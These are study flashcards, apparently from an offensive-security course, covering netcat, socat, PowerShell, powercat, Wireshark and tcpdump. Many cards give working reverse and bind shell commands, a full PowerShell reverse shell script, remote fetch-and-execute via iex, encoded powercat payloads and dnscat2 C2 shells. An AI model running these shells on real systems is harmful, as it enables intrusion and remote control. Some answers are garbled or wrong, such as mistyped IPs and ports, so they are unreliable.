Practical Tools Flashcards
5 often used practical tools.
Netcat, Socat, PowerShell, Wireshark, and Tcpdump.
What is netcat?
Netcat, first released in 1995 by Hobbit is one of the “original” network penetration testing tools and is so versatile that it lives up to the author’s designation as a hacker’s “Swiss army knife”. The clearest definition of Netcat is from Hobbit himself: a simple “utility which reads and writes data across network connections, using TCP or UDP protocols.”
How to use netcat?
nc
What ‘-n’ option do in Netcat?
Skip DNS name resolution.
What ‘-v’ option do in Netcat?
Add some verbosity.
What netcat arguments are required?
The destination IP address; and the destination port number.
How to check with netcat if TCP port 110 (the POP3 mail service) is open on 10.11.0.22.
nc -nv 10.11.0.22 110
How to use nc to connect to a POP3 service?
nc -nv 10.11.0.22 110
How to set up Netcat to listen for incoming connections on TCP port 4444?
nc -nlvp 4444
What ‘-n’ option do in netcat?
Disable DNS name resolution.
What ‘-l’ option do in netcat?
Create a listener.
What ‘-v’ option do in netcat?
Add some verbosity.
What ‘-p’ option do in netcat?
Specify the listening port number.
How to set up a listener using netcat on port 4444?
nc -nlvp 4444
How to connect to a listener using netcat on port 4444 and local address?
nc -nv 127.0.0.1 4444
What is dd in netcat?
Disk copying utility.
What is dd in netcat?
Disk copying utility.
How to use netcat, to receive a file “incoming.exe” on port 4444?
nc -nlvp 4444 > incoming.exe
How to use netcat to transfer a “wget.exe” file in “/usr/share/windows-resources/binaries” to another computer which is listening on port 4444 and have IP 10.11.0.22?
nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
What ‘-e’ option do in netcat?
Executes a program after making or receiving a successful connection.
How to check ip on windows?
ipconfig
How to use netcat to set up a bind shell on port 4444, which give remote access to command prompt?
nc -nlvp 4444 -e cmd.exe
How to use netcat to connect to a bind shell on port 4444 and IP 10.11.0.22?
nc -nv 10.11.0.22 4444
How to use nc to set up a listener in order to receive a reverse shell on port 4444?
nc -nlvp 4444
How to use netcat to send a reverse shell to IP 10.11.0.22 on port 4444?
nc -nv 10.11.0.22 4444 -e /bin/bash
How to reverse shell from Kali to Windows on port 4444, also IP on Windows Machine is 192.168.1.111?
Windows: ncat -nlvp 4444 -e cmd.exe
Linux: nc -nv 192.168.1.111 4444
Reverse shell from Windows to Kali on port 4444, Kali IP address is 172.20.176.78.
Linux: nc -nvlp 4444
Windows: ncat -nv 172.20.176.78 4444 cmd.exe
Bind shell on Kali. Use your Windows system to connect to it. Windows IP 192.168.1.111, Port 4444
Windows: ncat -nlvp 4444|
Linux: nc 192.168.1.111 4444 -e /bin/bash
Bind shell on Windows. Use your Kali machine to connect to it.
Linux: nc -lvp 4444
Windows: ncat 192.168.17.129 4444 -e cmd.exe
How to transfer a file from your Kali machine to Windows? On port 4444, from the path “/usr/share/windows-resources/binaries/wget.exe” and save it as “incoming.exe”. Windows IP address is 192.168.1.111.
Windows: ncat -nlvp 4444 > incoming.exe
Linux: nc -nv 192.168.1.111 4444 < /usr/share/windows-resources/binaries/wget.exe
How to transfer a file from Windows to Linux? On port 4444, send file “incoming.exe” and save it as “come.exe” on Linux Machine, which IP is 192.168.17.129.
Linux: nc -nlvp 4444 > come.exe
Windows: ncat -nv 192.168.17.129 4444 -e incoming.exe
What is socat?
Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. For penetration testing, it is similar to Netcat but has additional useful features.
How to use socat to connect to IP 10.11.1.5 at port 80?
socat - TCP4:10.11.1.5:80
How to create listener on port 443 using socat?
sudo socat TCP4-LISTEN:443 STDOUT
How to use socat to transfer a file names “secret_passwords.txt” on port 443?
sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
What does “fork” option do in socat?
Fork creates a child process once a connection is made to the listener, which allows multiple connections.
What does “file:” option do in socat?
“file:” specifies the name of a file to be transferred.
What “TCP4” option means in socat?
The TCP4 option specifies IPv4.
What does “file:” in socat specifies?
The local file name to save the file to.
What does “create” specifies in socat?
That a new file will be created.
How to create a file by echo? Named “secret_passwords.txt” and contains “123456” string.
echo “123456” > “secret_passwords.txt”
How to send file “secret_passwords.txt” from Kali to Windows through socat on port 443 and save it as “received_secret_paswords.txt”? Linux IP is 172.20.176.78.
Linux: sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
Windows: socat TCP4:127.20.176.78:443 file:received_secret_passwords.txt,create
How to open secret_passwords.txt file on Windows?
type secret_passwords.txt
What “-d -d” option do in socat?
Increase verbosity (showing fatal, error, warning, and notice messages).
What does “EXEC” option in socat?
Execute the given program once a remote connection is established.
How to use socat to send a reverse shell on IP address 10.11.0.22, on port 443?
socat TCP4:10.11.0.22:443 EXEC:/bin/bash
How to use socat to create a listener on port 443, with increased verbosity and with getting standard output?
socat -d -d TCP4-LISTEN:443 STDOUT
What “req” does in “openssl”?
req: initiate a new certificate signing request
What “-newkey” does in “openssl”?
generate a new private key
What “rsa:2048” does in “openssl”?
rsa:2048: use RSA encryption with a 2,048-bit key length.
What “-nodes” does in “openssl”?
-nodes: store the private key without passphrase protection
What “-keyout” does in “openssl”?
-keyout: save the key to a file
What “-x509” does in “openssl”?
-x509: output a self-signed certificate instead of a certificate request
What “-days” does in “openssl”?
-days: set validity period in days
What “-out” does in “openssl”?
-out: save the certificate to a file
What is OpenSSL?
OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer
Security (TLS v1) network protocols and related cryptography standards required by them.
The openssl program is a command line tool for using the various cryptography functions of OpenSSL's crypto library from the shell. It can be used for
How to use socat to create an encrypted bin shell on port 443?
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
How to transfer file called ‘powercat.ps1’ from Linux machine to Windows system using socat? Path to powercat.ps1 is /usr/share/powershell-empire/empire/server/data/module_source/management/. Linux IP address is 192.168.17.129. Send it through port 443.
Linux: sudo socat TCP4-LISTEN:443,fork file:/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1
Windows: socat TCP4:192.168.17.129:443 file:powercat.ps1,create
PowerShell
Windows PowerShell is a task-based command line shell and scripting language. It is designed specifically for system administrators and power-users to rapidly automate the administration of multiple operating systems (Linux, macOS, Unix, and Windows) and the processes related to the applications that run on them.
Windows Powershell 5.0 on which OS?
Windows Server 2016, installed by default
Windows Server 2012 R2/Windows Server 2012/Windows Server 2008 R2 with Service Pack
1/Windows 8.1/Windows 7 with Service Pack 1 (install Windows Management Framework
5.0 to run it)
Windows Powershell 4.0 on which OS?
- Windows 8.1/Windows Server 2012 R2, installed by default
- Windows 7 with Service Pack 1/Windows Server 2008 R2 with Service Pack 1 (install Windows Management Framework 4.0 to run it)
Windows PowerShell 3.0 on which OS?
- Windows 8/Windows Server 2012, installed by default
- Windows 7 with Service Pack 1/Windows Server 2008 R2 with Service Pack 1/2 (install Windows Management Framework 3.0 to run it)
How to set an “Unrestricted” execution policy on our Windows client machine in PowerShell?
Set-ExecutionPolicy Unrestricted
How to use PowerShell to download a file “wget.exe” from Linux Machine (ip: 10.11.0.4) which started apache2, and save the file on Desktop?
powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.11.0.4/wget.exe’,’C:\Users\offsec\Desktop\wget.exe’)”
What does ‘-c’ option does in PowerShell prompt?
This will execute the supplied command (wrapped in double-quotes) as if it were typed at the PowerShell prompt.
How to host wget.exe on Kali machine by Apache Service?
sudo cp /usr/share/windows-resources/binaries/wget.exe /var/www/html
sudo systemctl start apache2
PowerShell reverse shell for IP address 10.11.0.4, port 443.
$client = New-Object System.Net.Sockets.TCPClient(‘10.11.0.4’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close();
How to use PowerShell to send a reverse shell?
powershell -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.11.0.4’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out- String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}
$client.Close()”
What does it do?
powershell -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.11.0.4’,443);
Assign IP address and Port
What does it do? $stream = $client.GetStream();
Gets the network stream class.
What does it do? [byte[]]$bytes = 0..65535|%{0};
It’s used as a buffer
What does it do? while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
It’s a while loop reading the data to/from network stream.
What does it do? $client.Close()”
Close the client connection.
What is IEX?
Invoke-Expression
How to use nc to receive a reverse shell? Port 443
sudo nc -lnvp 443
How to use PowerShell to set up a bind shell?
powershell -c “
$listener = New-Object System.Net.Sockets.TcpListener(‘0.0.0.0’,443);
$listener.start();$client =
$listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes =
0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data =
(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =
(iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘>
‘;$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng
th);$stream.Flush()};$client.Close();$listener.Stop()”
How to use netcat to connect to a bind shell created using PowerShell? IP address of machine is 10.11.0.22 and port is 443.
nc -nv 10.11.0.22 443
What $listener = New-Object System.Net.Sockets.TcpListener(‘0.0.0.0’,443); does?
Listener variable using System.Net.Sockets.TcpListener class, this class requires 2 arguments, the listening address and port. (‘0.0.0.0’,443)
What is Powercat?
Powercat is essentially the PowerShell version of Netcat written by besimorhino. It is a script we can download to a Windows host to leverage the strengths of PowerShell and simplify the creation of bind/reverse shells. Powercat can be installed in Kali with apt install powercat, which will place the script in /usr/share/windows-resources/powercat.
How to install powercat on Linux?
apt install powercat
If you would install powercat with apt, where it will be placed?
/usr/share/windows-resources/powercat
Who created powercat?
Besimorhino
How to load a local PowerShell script using dot sourcing?
PS C:\Users\Offsec> . .\powercat.ps1
How to load a remote PowerShell script using iex? WWW address is https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1.
PS C:\Users\Offsec> iex (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’)
How to execute the powercat function directly in PowerShell?
PS C:\Users\offsec> powercat
How to print The Powercat help menu?
PS C:\Users\offsec> powercat -h
How to use netcat to set up a listener for powercat file transfer?
sudo nc -lnvp 443 > receiving_powercat.ps1
What ‘-c’ option specifies in powercat?
Client mode, and sends the listening IP address.
What ‘-p’ option specifies in powercat?
Specifies the port number to conenct to.
What ‘-i’ option specifies in powercat?
Indicates the local file that will be transferred remotely.
How to use Powercat to send a file C:\Users\Offsec\powercat.ps1? We want to send it to machine with IP address 10.11.0.4 by port 443.
PS C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
How to use netcat to set up a listener in order to receive a reverse shell from powercat?
kali@kali:~$ sudo nc -lvp 443
How to use powercat in order to send a reverse shell?
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe
What ‘-e’ option specifies in this command ‘powercat -c 10.11.0.4 -p 443 -e cmd.exe’?
Application to execute (cmd.exe) once a connection is made to a listening port.
How to use powercat to set up a bind shell?
PS C:\Users\offsec> powercat -l -p 443 -e cmd.exe
What ‘-l’ option in powercat do?
Create listener.
What ‘-p’ option in powercat do?
Specify the listening port number.
What ‘-e’ option in powercat do?
Application (cmd.exe) executed once connected
How to use netcat to connect to a bind shell created by powercat?
kali@kali:~$ nc 10.11.0.22 443
What is a payload?
Payload is a set of powershell instructions as well as the portion of the powercat script itself that only includes the features requested by the user.
How to create and execute a stand-alone payload?
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
PS C:\Users\offsec> ./reverseshell.ps1
How to create an encoded stand-alone payload with powercat?
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
What ‘-E’ option means in PowerShell?
EncodedCommand
How to execute an encoded stand-alone payload using PowerShell?
PS C:\Users\offsec> powershell.exe -EZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABAHIAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzACkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAsACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQByAHMACgAgACAAIAAgAGkAZgAoACQAZwBsAG8YgBhAGwAOgBWAGUAcgBiAG8AcwBlACkAewAkAFYAZQByAGIAbwBzAGUAIAA9ACAAJABUAHIAdQBlAH0ACgAgACAA
IAAgACQARgB1AG4AYwBWAGEAcgBzACAAPQAgAEAAewB9AAoAIAAgACAAIABpAGYAKAAhACQAbAApAAoAIAAgAC
AAIAB7AAoAIAAgACAAIAAgACAAJABGAHUAbgBjAFYAYQByAHMAWwAiAGwAIgBdACAAPQAgACQARgBhAGwAcwBl
AAoAIAAgACAAIAAgACAAJABTAG8AYwBrAGUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdA
BlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAKACAAIAAgACA
How to receive a stand-alone reverse shell?
kali@kali:~$ sudo nc -lnvp 443
Make reverse shell to connect to Windows from Linux machine and obtain cmd.exe. Port 9000, IP address 172.19.253.220.
kacper@hopper:$ nc -nvlp 9000
C:\Users>ncat -nv 172.19.253.220 9000 -e cmd.exe
What is powercat?
Netcat: The powershell version.
Basic Connections in powercat?
Basic Client
Basic Listener
Basic Client, Output as Bytes
Basic Client command in powercat?
powercat -c 10.1.1.1 -p 443
Basic Listener command in powercat?
powercat -l -p 8000
Basic Client, Output as Bytes command in powercat?
powercat -c 10.1.1.1 -p 443 -o Bytes
Types of File Transfer in netcat?
Send File
Receive File
How to send file by powercat?
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
How to receive file by Powercat?
powercat -l -p 8000 -of C:\inputfile
What can I do with shells by powercat?
Serve CMD Shell
Send CMD Shell
Serve a shell which executes powershell commands
How to serve a CMD Shell?
powercat -l -p 443 -e cmd
How to send a CMD Shell?
powercat -c 10.1.1.1 -p 443 -e cmd
How to serve a shell that executes PowerShell commands?
powercat -l -p 443 -ep
Powercat DNS and UDP functionalities
Send Data Over UDP
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows
Send Data Over UDP
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows
powercat -dns c2.example.com -e cmd
How Relays in netcat works?
Just like traditional netcat relays, but you don’t have to create a file or start a second process. You can also relay data between connections of different protocols.
Type of Relays in netcat
TCP Listener to TCP Client Relay TCP Listener to UDP Client Relay TCP Listener to DNS Client Relay TCP Listener to DNS Client Relay using the Windows Default DNS Server TCP Client to Client Relay TCP Listener to Listener Relay
TCP Listener to TCP Client Relay
powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP Listener to UDP Client Relay
powercat -l -p 8000 -r udp:10.1.1.16:53
TCP Listener to DNS Client Relay
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
TCP Listener to DNS Client Relay using the Windows Default DNS Server
powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay
powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP Listener to Listener Relay
powercat -l -p 8000 -r tcp:9000
TCP Listener to Listener Relay
powercat -l -p 8000 -r tcp:9000
Generate Payloads types
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443
Generate a bind tcp encoded command which listens on port 8000
How to generate a reverse tcp payload which connects back to 10.1.1.15 port 443 using powercat?
powercat -c 10.1.1.15 -p 443 -e cmd -g
How to generate a bind tcp encoded command which listens on port 8000 using powercat?
powercat -l -p 8000 -e cmd -ge
How to perform Basic TCP Port Scanner using powercat?
(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
How to Start A Persistent Server That Serves a File using powercat?
powercat -l -p 443 -i C:\inputfile -rep
How to set up listener on Linux on port 443?
sudo nc -lnvp 443
How to send files by powercat to Linux? You want to transfer file “powercat.ps1” which path is “C:\Users\boncz”, on your Linux machine you want to get it through port 443, save as “receiving_powercat.ps1”, and your IP address is 172.19.253.220.
kacper@hopper:~/powercat$ sudo nc -lnvp 443 > receiving_powercat.ps1
PS C:\Users\boncz> powercat -c 172.19.253.220 -p 443 -i C:\Users\boncz\powercat.ps1
PowerShell Reverse Shell important steps.
Get Powercat through Linux probably.
Dotsource Powercat.ps1.
IEX Powercat
Listen on Linux, then execute Reverse Shell on Windows PS with ‘-c’ option.
How to create Bind Shell by Powercat?
PS C:\Users\boncz> powercat -l -p 443 -e cmd.exe
kacper@hopper:$ nc -nv 192.168.1.111 443
How to set listening with powercat on port 443, with executable cmd.exe, and connect with another powercat to the cmd.exe? Destination IP is 192.168.1.111 and Destination Port is 443.
PS C:\Users\boncz> powercat -l -p 443 -e cmd.exe
PS C:\Users\boncz> powercat -c 192.168.1.111 443
How to create ps script which is stand-alone payload in powercat? Destination IP is 172.19.253.220 and port is 443. You want to execute cmd.exe.
Linux: sudo nc -nlvp 44
PS: powercat -c 172.19.253.220 -p 443 -e cmd.exe -g > reverseshell.ps1
PS: ./reverseshell.ps1
How to create encoded reverse shell by powercat? Destination IP is 172.19.253.220, the destination port is 443, you want to execute cmd.exe on payload, and save file as “encodedreverseshell.ps1”.
PS C:\Users\boncz> powercat -c 172.19.253.220 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
How to execute encrypted payload in powershell?
PS C:> powershell.exe -E
kacper@hopper:/mnt/c/WINDOWS/system32$ sudo nc -nlvp 443
What is Wireshark?
Wireshark, is a must-have tool for learning network protocols, analyzing network traffic, and debugging network services.
Which libraries Wireshark uses on Linux?
Libpcap
Which libraries Wireshark uses on Windows?
Winpcap
What capture filters do in Wireshark?
If we apply capture filters during a Wireshark session, any packets that do not match the filter criteria will be dropped and the remaining data is passed on to the capture engine.
What capture engine do in Wireshark?
Dissects the incoming packets, analyzes them, and finally applies any additional display filters before displaying the output.
Order from the Wire to Wireshark.
Network -> Capture Filters -> Capture Engine -> Display Filters
How to run Wireshark from terminal?
kali@kali:~$ sudo wireshark
Why do we use Capture Filters in Wireshark?
To reduce the amount of captured traffic by discarding any traffic that does not match our filter and narrow our focus to the packets we wish to analyze.
How to use net filter, to capture only traffic on the 10.11.1.0/24 address range?
net 10.11.1.0/24
How to connect ftp on ip 10.11.1.13?
kacper@hopper:/mnt/c/WINDOWS/system32$ ftp 10.11.1.13
How can you capture network traffic exactly for FTP connection estabilished on 10.11.1.13? What is capture and display filter for this?
Capture Filter: net 10.11.1.0/24
Display Filter: tcp.port == 21
How to set a display filter for all traffic on port 21?
tcp.port == 21
How to follow a TCP stream in Wireshark?
RMB -> Follow -> TCP Stream
How to use display filter to only monitor traffic on port 110?
tcp.port == 110
What Exactly Is Port Filtering?
Port filtering represents a way of filtering packets (messages from different network protocols) based on their port number. These port numbers are used for TCP and UDP protocols, the best-known protocols for transmission. Port filtering represents a form of protection for your computer since, by port filtering, you can choose to allow or block certain ports to prevent different operations within the network.
How to capture only traffic to or from IP address 172.18.5.4?
host 172.18.5.4
How to capture traffic to or from a range of IP addresses? 192.168.x.x
net 192.168.0.0/24
or
net 192.168.0.0 mask 255.255.255.0
How to capture traffic from a range of IP addresses using Wireshark CaptureFilters?
src net 192.168.0.0/24
or
src net 192.168.0.0 mask 255.255.255.0
How to capture traffic to a range of IP addresses using CaptureFilters in Wireshark?
dst net 192.168.0.0/24
or
dst net 192.168.0.0 mask 255.255.255.0
How to capture only DNS (port 53) traffic using CaptureFilters in Wireshark?
port 53
DNS port
53
How to capture non-HTTP and non-SMTP traffic on your server? Let’s say your domain is www.example.com.
host www.example.com and not (port 80 or port 25)
or
host www.example.com and not port 80 and not port 25
How to capture except all ARP and DNS traffic using CaptureFilters in Wireshark?
port not 53 and not arp
How to capture traffic within a range of ports using CaptureFilters in Wireshark?
(tcp[0:2] > 1500 and tcp[0:2] < 1550) or (tcp[2:2] > 1500 and tcp[2:2] < 1550)
or, with newer versions of libpcap (0.9.1 and later):
tcp portrange 1501-1549
What is libpcap library for?
Wireshark/TShark uses libpcap to capture live network data.
How to capture only Ethernet type EAPOL using CaptureFilters in Wireshark?
ether proto 0x888e
How to reject ethernet frames towards the Link Layer Discovery Protocol Multicast group using CaptureFilters using Wireshark?
not ether dst 01:80:c2:00:00:0e
How to capture only IPv4 traffic - the shortest filter, but sometimes very useful to get rid of lower layer protocols like ARP and STP using CaptureFilters in Wireshark?
ip
How to capture only unicast traffic - useful to get rid of noise on the network if you only want to see traffic to and from your machine, not, for example, broadcast and multicast announcements using CaptureFilters in Wireshark?
not broadcast and not multicast
How to capture IPv6 “all nodes” (router and neighbor advertisement) traffic using CaptureFilters in Wireshark?
dst host ff02::1
How to capture HTTP GET requests. This looks for the bytes ‘G’, ‘E’, ‘T’, and ‘ ‘ (hex values 47, 45, 54, and 20) just after the TCP header. “tcp[12:1] & 0xf0)»_space; 2” figures out the TCP header length using CaptureFilters in Wireshark?
port 80 and tcp[((tcp[12:1] & 0xf0)»_space; 2):4] = 0x47455420
Use the capture filter to only collect traffic on port 110.
tcp port 110
What is tcpdump?
Tcpdump is a text-based network sniffer that is streamlined, powerful, and flexible despite the lack of a graphical interface. It is by far the most commonly-used command-line packet analyzer and can be found on most Unix and Linux operating systems, but local user permissions determine the ability to capture network traffic.
How to use tcpdump to read packet capture named “password_cracking_filtered.pcap”?
kali@kali:~$ sudo tcpdump -r password_cracking_filtered.pcap
What ‘-n’ option do in tcpdump?
Skip DNS name lookups.
What ‘-r’ option do in tcpdump?
Read from packet capture file.
What ‘sort | uniq -c’ do?
Sort and count the number of times the field appears.
What ‘head’ do?
Display the first 10 lines of the output.
How to use tcpdump to read and filter the packet capture? We want to skip DNS name lookups, read from our packet capture filter named “password_cracking_filtered.pcap”. Print the destination IP address and port, sort and count the numbers of times the field appears in the capture, respectively, and display only the first 10 lines of the output.
sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F” “ ‘{print $5}’ | sort | uniq -c | head.
What is src host in tcpdump?
Source host
What is dst host in tcpdump?
Destination host
How to filter by port number (81) using tcpdump?
-n port 81
How to filter source host 172.16.40.10 in file “password_cracking_filtered.pcap” using tcpdump?
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
How to filter destination host 172.16.40.10 in file “password_cracking_filtered.pcap” using tcpdump?
sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
How to filter by port number both source and destination traffic against port 81 in file “password_cracking_filtered.pcap”?
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
What ‘-X’ option do in tcpdump?
Prints the packet data in both HEX and ASCII format.
How to use tcpdump to read the packet capture in hex/ascii output from file “password_cracking_filtered.pcap”?
sudo tcpdump -nX -r password_cracking_filtered.pcap
How to convert the binary bits (00011000) to decimal in bash?
kali@kali:~$ echo “$((2#00011000))”
How to use tcpdump to recreate the Wireshark exercise of capturing traffic on port 110.
sudo tcpdump port 80
How to use the -X flag to view the content of the packet. If data is truncated, investigate how the -s flag might help.
What ‘-X’ option do in tcpdump?
-x When parsing and printing, in addition to printing the headers of each packet, print the data of each
packet (minus its link level header) in hex. The smaller of the entire packet or snaplen bytes will be
printed. Note that this is the entire link-layer packet, so for link layers that pad (e.g. Ethernet),
the padding bytes will also be printed when the higher layer packet is shorter than the required pad‐
ding.
What ‘-s’ option do in tcpdump?
-s snaplen
–snapshot-length=snaplen
Snarf snaplen bytes of data from each packet rather than the default of 262144 bytes. Packets trun‐
cated because of a limited snapshot are indicated in the output with ``[|proto]’’, where proto is the
name of the protocol level at which the truncation has occurred. Note that taking larger snapshots
both increases the amount of time it takes to process packets and, effectively, decreases the amount of
packet buffering. This may cause packets to be lost. You should limit snaplen to the smallest number
that will capture the protocol information you’re interested in. Setting snaplen to 0 sets it to the
default of 262144, for backwards compatibility with recent older versions of tcpdump.
Wrapping up, what’s practical tools you learned here?
Netcat, socat, tcpdump, wireshark, powershell
